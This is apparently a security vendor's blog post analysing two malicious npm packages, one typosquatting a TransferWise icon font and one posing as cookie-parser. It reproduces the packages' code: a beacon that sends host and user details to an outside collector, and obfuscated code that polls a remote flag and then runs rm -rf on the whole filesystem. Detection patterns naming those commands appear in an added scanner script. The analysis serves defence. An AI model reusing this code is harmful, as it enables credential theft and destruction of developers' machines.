
Nightmares on npm: How Two Malicious Packages Facilitate Data Theft and Destruction

Our threat research team breaks down two malicious npm packages designed to exploit developer trust, steal your data, and destroy data on your machine.

Kush Pandya

October 9, 2024


Every day, our security team sifts through countless npm packages. While most packages published to public registries are safe and useful, some slip through the cracks with malicious intent. Recently, we encountered two particularly troubling packages that highlight some common strategies cybercriminals use to exploit developers: one designed to steal sensitive data outright, and another cleverly disguised to destroy data on your system. This post gives you a glimpse into some of the threats that are lurking in open source package repositories.

Threat Analyses

Both of the concerning packages on npm have now been marked as malware and we have asked the registry to remove them: transferwise-iconfont and protect-api. Each one represents a different level of sophistication in malicious code distribution.

Package 1: The Data Thief

We see these kinds of packages every day in our feed. They are often labeled as test packages or something similar, but in many cases they act as spyware.

The transferwise-iconfont package is essentially squatting the namespace for the legitimate TransferWise Iconfont library, developed by Wise, formerly known as TransferWise, a financial technology company focused on global money transfers. The code in the package is not related to the iconfont or copied from its GitHub repo.

const trackingData = JSON.stringify({
    p: package,
    c: __dirname,
    hd: os.homedir(),
    hn: os.hostname(),
    un: os.userInfo().username,
    dns: dns.getServers(),
    r: packageJSON ? packageJSON.___resolved : undefined,
    v: packageJSON.version,
    pjson: packageJSON,
});

var postData = querystring.stringify({
    msg: trackingData,
});

var options = {
    hostname: "r7z12f7knlides86u06z22fpzg57tzho.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
    port: 443,
    path: "/",
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": postData.length,
    },
};

This package doesn't try to hide its malicious intent. It openly collects sensitive data from the user's system and sends it to a remote server controlled by the attacker. While its brazenness makes it easier to detect through code review, it can still pose a significant threat if overlooked.

Package 2: The Data Destroyer

The second package, protect-api, is masquerading as the legitimate "cookie-parser" package. It employs sophisticated obfuscation techniques to hide its true nature. At first glance, it appears to be a legitimate utility for handling HTTP cookies. However, buried within layers of obfuscated code lies a destructive function.

function signedCookie(_0x2312a4, _0x9d2acc) {
  if (typeof _0x2312a4 !== "string") {
    return undefined;
  }
  if (_0x2312a4.substr(0x0, 0x2) !== 's:') {
    return _0x2312a4;
  }
  var _0xc597d9 = !_0x9d2acc || Array.isArray(_0x9d2acc) ? _0x9d2acc || [] : [_0x9d2acc];
  for (var _0x393c39 = 0x0; _0x393c39 < _0xc597d9.length; _0x393c39++) {
    var _0x505789 = signature.unsign(_0x2312a4.slice(0x2), _0xc597d9[_0x393c39]);
    if (_0x505789 !== false) {
      return _0x505789;
    }
  }
  return false;
}
const sh = require('shelljs');
module.exports = protectAPI;
function protectAPI() {
  if (!__dirname.includes("mware") && !__dirname.includes('minhtit')) {
    setInterval(() => {
      fetch('https://6514b3f1dc3282a6a3cd7125.mockapi.io/server/1').then(_0x231e3e => _0x231e3e.json()).then(_0x361fb2 => {
        if (_0x361fb2.isAngry) {
          angry();
        }
      })['catch'](_0x5d61c5 => {})["finally"](_0x1c49c6 => {});
    }, 0xbb8);
  }
}
function angry() {
  sh.exec("rm -rf *  > /dev/null 2>&1");
  sh.exec("rm -rf /*  > /dev/null 2>&1");
  sh.exec("rm -rf /  > /dev/null 2>&1");
  sh.exec("rm -rf ~/*  > /dev/null 2>&1");
}

This package is particularly dangerous because not only does it hide its malicious intent through obfuscation but it also includes a delay mechanism. The angry() function, which attempts to delete all files on the system, is scheduled to execute an hour after the package is installed, making it harder to trace back to the source.

The Anatomy of the Attacks

Both packages exploit the trust developers place in the npm ecosystem. The simple spyware package operates on the assumption that developers might not scrutinize a logging utility too closely. It collects sensitive data, potentially including environment variables that might contain API keys or other credentials, and exfiltrates this information to the attacker's server.

The obfuscated package is more insidious. It leverages legitimate-looking functionality (cookie parsing) as a cover for its destructive payload. The use of code obfuscation makes it challenging for automated tools and manual reviews to detect the malicious code. The delayed execution of the destructive function further complicates attribution and detection.

Protecting Yourself and Your Organization

npm is rife with low-effort attempts to compromise unsuspecting users' machines or data. Here are a few best practices for making sure one of these packages doesn't land in your code base:

  1. Verify Package Sources: Always check the reputation of package authors and the package's download statistics. Be wary of new packages with few downloads.
  2. Code Review: Implement stringent code review practices, especially for third-party dependencies. Look out for obfuscated code and unexpected network calls.
  3. Use Security Tools: Employ automated security scanning tools that can detect known malicious patterns and vulnerabilities in your dependencies.
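
The review cues in the list above (obfuscated code, unexpected network calls) can be turned into a first-pass triage script. The following is an added example, not Socket's detection logic or code from either package; the rule ids, thresholds and sample strings are constructed, and a hit is a prompt for manual review rather than a verdict.

```javascript
// Added example: heuristic triage for the traits this post describes.
// Rule ids, thresholds and the SAMPLE_* strings are constructed for illustration.
const RULES = [
  { id: "hex-identifiers", min: 5, re: /\b_0x[0-9a-f]{4,}\b/g },   // obfuscator-style names
  { id: "host-fingerprint", min: 3,                                  // several host/user lookups
    re: /\bos\.(?:homedir|hostname|userInfo)\s*\(|\bdns\.getServers\s*\(/g },
  { id: "hardcoded-host", min: 1, re: /hostname\s*:\s*["'][\w.-]+\.[a-z]{2,}["']/gi },
  { id: "destructive-shell", min: 1,                                 // rm -rf on /, ~ or * only
    re: /\brm\s+-rf\s+(?:\/\*?|~(?:\/\*?)?|\*)(?=[\s"'`;]|$)/g },
  { id: "timed-remote-poll", min: 1, re: /setInterval\s*\([\s\S]{0,200}?\bfetch\s*\(/g },
];

// Return one finding per rule whose match count reaches its threshold.
function scanSource(source) {
  const findings = [];
  for (const rule of RULES) {
    const matches = [...source.matchAll(rule.re)];
    if (matches.length < rule.min) continue;
    const firstLine = source.slice(0, matches[0].index).split("\n").length;
    findings.push({ id: rule.id, count: matches.length, firstLine });
  }
  return findings;
}

// Combine findings into labels a reviewer can act on.
function classify(source) {
  const ids = new Set(scanSource(source).map((f) => f.id));
  const labels = [];
  if (ids.has("host-fingerprint") && ids.has("hardcoded-host")) labels.push("possible-exfiltration");
  if (ids.has("destructive-shell")) labels.push("destructive-command");
  if (ids.has("timed-remote-poll")) labels.push("remote-trigger");
  if (ids.has("hex-identifiers")) labels.push("obfuscated");
  return labels;
}

const SAMPLE_BEACON = [
  'const body = JSON.stringify({ hd: os.homedir(), hn: os.hostname(),',
  '  un: os.userInfo().username, dns: dns.getServers() });',
  'const options = { hostname: "collector.example", port: 443, method: "POST" };',
].join("\n");
const SAMPLE_TRIGGER = [
  'function a(_0x1a2b3c, _0x4d5e6f) { var _0xaa11bb = _0x1a2b3c; return _0xaa11bb || _0x4d5e6f; }',
  'setInterval(() => { fetch("https://flag.example/1").then((_0x77cc88) => _0x77cc88.json()); }, 0xbb8);',
  'sh.exec("rm -rf ~/*");',
].join("\n");
const SAMPLE_BENIGN = 'sh.exec("rm -rf /tmp/build-cache"); console.log(os.hostname());';

console.log(classify(SAMPLE_BEACON), classify(SAMPLE_TRIGGER), classify(SAMPLE_BENIGN));
```

Run it over each file of a dependency before it is approved; the benign sample shows that a single hostname lookup or a scoped cleanup command does not trip the rules.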

If you're not yet using Socket, our AI-powered threat detection is the best way to protect yourself from these types of nightmare packages. Install our free Socket for GitHub app with just two clicks to instantly protect your repos from these types of threats. It will automatically scan your dependencies for security and code quality issues and give you real-time alerts.

Conclusion

The npm ecosystem, while incredibly powerful and convenient, is not without its dangers. The cases we've explored today are just a small sampling of the security threats we see plaguing open source code repositories.

Don't let your project become the next victim of a malicious package. The best defense against these threats is a combination of awareness, tools, and best practices. Stay safe out there!

Supplementary Materials & IOCs

  • Affected Package 1: transferwise-iconfont
  • Affected Package 2: protect-api
  • r7z12f7knlides86u06z22fpzg57tzho.oastify[.]com
  • hxxps://6514b3f1dc3282a6a3cd7125.mockapi[.]io/server/1
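
To check whether a project resolves either package, walk its lockfile, including transitive entries. This is an added example rather than part of the original post; the sample lockfiles and version strings are constructed, and only the two package names are taken from this post.

```javascript
// Added example: audit a parsed package-lock.json for the packages named in this post.
// SAMPLE_* lockfiles and their version strings are constructed placeholders.
const FLAGGED = new Set(["transferwise-iconfont", "protect-api"]);

// lockfileVersion 2/3: flat "packages" map keyed by install path.
function fromPackagesMap(packages) {
  const hits = [];
  for (const [path, meta] of Object.entries(packages || {})) {
    if (!path) continue; // "" is the root project itself
    const i = path.lastIndexOf("node_modules/");
    // meta.name is set when the folder name differs from the real package name (aliases).
    const name = meta.name || (i < 0 ? path : path.slice(i + "node_modules/".length));
    if (FLAGGED.has(name)) hits.push({ name, version: meta.version, via: path });
  }
  return hits;
}

// lockfileVersion 1: nested "dependencies" tree; record the chain that pulls the package in.
function fromDependencyTree(deps, trail = []) {
  const hits = [];
  for (const [name, meta] of Object.entries(deps || {})) {
    const via = [...trail, name];
    if (FLAGGED.has(name)) hits.push({ name, version: meta.version, via: via.join(" > ") });
    hits.push(...fromDependencyTree(meta.dependencies, via));
  }
  return hits;
}

function auditLockfile(lock) {
  return lock.packages ? fromPackagesMap(lock.packages) : fromDependencyTree(lock.dependencies);
}

const SAMPLE_V3 = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/some-middleware": { version: "1.0.0" },
    "node_modules/some-middleware/node_modules/protect-api": { version: "0.0.0-constructed" },
  },
};
const SAMPLE_V1 = {
  lockfileVersion: 1,
  dependencies: {
    "ui-kit": { version: "1.0.0",
      dependencies: { "transferwise-iconfont": { version: "0.0.0-constructed" } } },
  },
};

console.log(auditLockfile(SAMPLE_V3), auditLockfile(SAMPLE_V1));
```

Feed it `JSON.parse` of the real `package-lock.json`; the `via` field shows which direct dependency needs to be removed or replaced.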
